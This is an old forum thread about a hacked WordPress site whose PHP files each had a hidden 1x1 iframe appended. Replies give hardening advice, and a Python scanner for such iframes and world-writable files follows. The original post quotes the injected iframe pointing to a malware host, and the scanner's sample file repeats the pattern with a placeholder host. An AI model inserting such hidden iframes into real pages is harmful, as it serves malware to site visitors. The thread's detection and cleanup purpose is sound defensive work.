Site was hacked

Discussion in 'Site & Server Administration' started by rederick, Jun 18, 2007.

  1. #1
    Hi there,

    I've had a site that I help maintain get hacked. It's a strange sort of hack and luckily it doesn't seem too damaging. Might even be some type of virus installed on the server. Anyway, it seems that every single one of the .php files on the site now has the code below placed at the bottom of the file.

    <iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe>
    
    The site is running WordPress Version 2.0 and has a lot of custom coding.

    I am moving the site off this server shortly - but just curious if anyone has seen this type of thing before?
     
    rederick, Jun 18, 2007 IP
  2. ndreamer

    #2
    Do you run a virus scanner? Those iframe hacks normally point to spyware, viruses or trojans, which are very damaging not only to your users but to your site, as Google will update your site's listing with a nice warning next to it.

    I'm not familiar with WordPress. If it has any config files, check in those for the iframe; if it's there, remove it and chmod the file so it's not writable.
     
    ndreamer, Jun 19, 2007 IP
  3. agnivo007

    #3
    Make a habit of upgrading to the latest WP version and of not unnecessarily leaving 777 permissions.
     
    agnivo007, Jun 19, 2007 IP
  4. InFloW

    #4
    Always keep your scripts up to date! Even if you have custom coding, make sure to patch exploits that are released for your script. When you're running old versions of things like WordPress, it's simply a matter of time before you're exploited. People just do searches for "powered by WordPress", check the exploit and move on. Quite a few exploit attempts are even done with bots, so if you're in Google you'll eventually be found.
     
    InFloW, Jun 19, 2007 IP
  5. inworx

    #5
    Check your server for any shells, exploits, etc., and CHMOD most of the files to 644 or so.
     
    inworx, Jun 19, 2007 IP
  6. rederick

    #6
    Yeah, the site is on a $9 a month shared host and the WordPress version is out of date, but the guy who owns the site won't pay me - so sad to say that he's on his own.

    Just thought it was interesting to have that type of thing happen to a website, as I wasn't exactly sure how the hacker benefited from that.


    Thank you for the feedback.
     
    rederick, Jun 19, 2007 IP
  7. clancey

    #7
    Read this article at Pandasoftware

    The problem is likely non-trivial. Mpack apparently contains tools which help buyers locate vulnerable web servers. They are then inserting "iframe" code into the webpages, which tries to place malware on the visitor's computer.

    The web server probably has some kind of shell installed. In a shared hosting environment, the hacker may be able to probe around to see what else they might discover about the machine.

    Computers infected via the iframe become part of the botnets used to send out spam, launch DDOS attacks and so on and so on.
     
    clancey, Jun 19, 2007 IP
  8. inworx

    #8
    Check with validator.w3.org.

    You'll see any errors in any page, including the iframe.
     
    inworx, Jun 20, 2007 IP
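
The checks suggested in posts #2, #3 and #5 (look for the iframe in the .php files, avoid 777, keep files at 644), combined into one web-root scan as an added example that is not code from any poster in the thread. The function names, the sample files and the `injected.example` / `video.example` hosts are constructed for illustration, and the scan only covers the pattern from post #1: an iframe whose width and height are both 0 or 1.

```python
import os, re, stat, tempfile

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Attribute values may be double-quoted, single-quoted or bare (as in the injected tag).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def hidden_iframes(text):
    """Return the src of every iframe whose width and height are both 0 or 1."""
    hits = []
    for tag in IFRAME_RE.finditer(text):
        attrs = {k.lower(): (dq or sq or bare)
                 for k, dq, sq, bare in ATTR_RE.findall(tag.group(1))}
        dims = [attrs.get("width", ""), attrs.get("height", "")]
        if all(d.strip().rstrip("px") in ("0", "1") for d in dims):
            hits.append(attrs.get("src", ""))
    return hits

def scan_webroot(root):
    """Return ({php_file: [iframe src, ...]}, [world-writable paths]) under root."""
    infected, world_writable = {}, []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # symlink modes are meaningless; do not follow them
            rel = os.path.relpath(path, root)
            if mode & stat.S_IWOTH:  # the "other" write bit, set by 777 or 666
                world_writable.append(rel)
            if stat.S_ISREG(mode) and name.lower().endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    srcs = hidden_iframes(fh.read())
                if srcs:
                    infected[rel] = srcs
    return infected, sorted(world_writable)

def build_sample(root):
    """Constructed sample web root; host names are placeholders."""
    clean = "<?php echo 'hello'; ?>\n"
    bad = clean + ("<iframe src=http://injected.example/sp/ frameborder=0 "
                   "width=1 height=1 scrolling=no></iframe>\n")
    ok = clean + '<iframe src="https://video.example/embed" width="560" height="315"></iframe>\n'
    for name, body, mode in [("index.php", bad, 0o777), ("about.php", ok, 0o644),
                             ("wp-config.php", clean, 0o644)]:
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        print(scan_webroot(root))
```

A hit lists the files to clean or restore; it does not show how the write happened, so the shell check and the patching mentioned in the thread still apply.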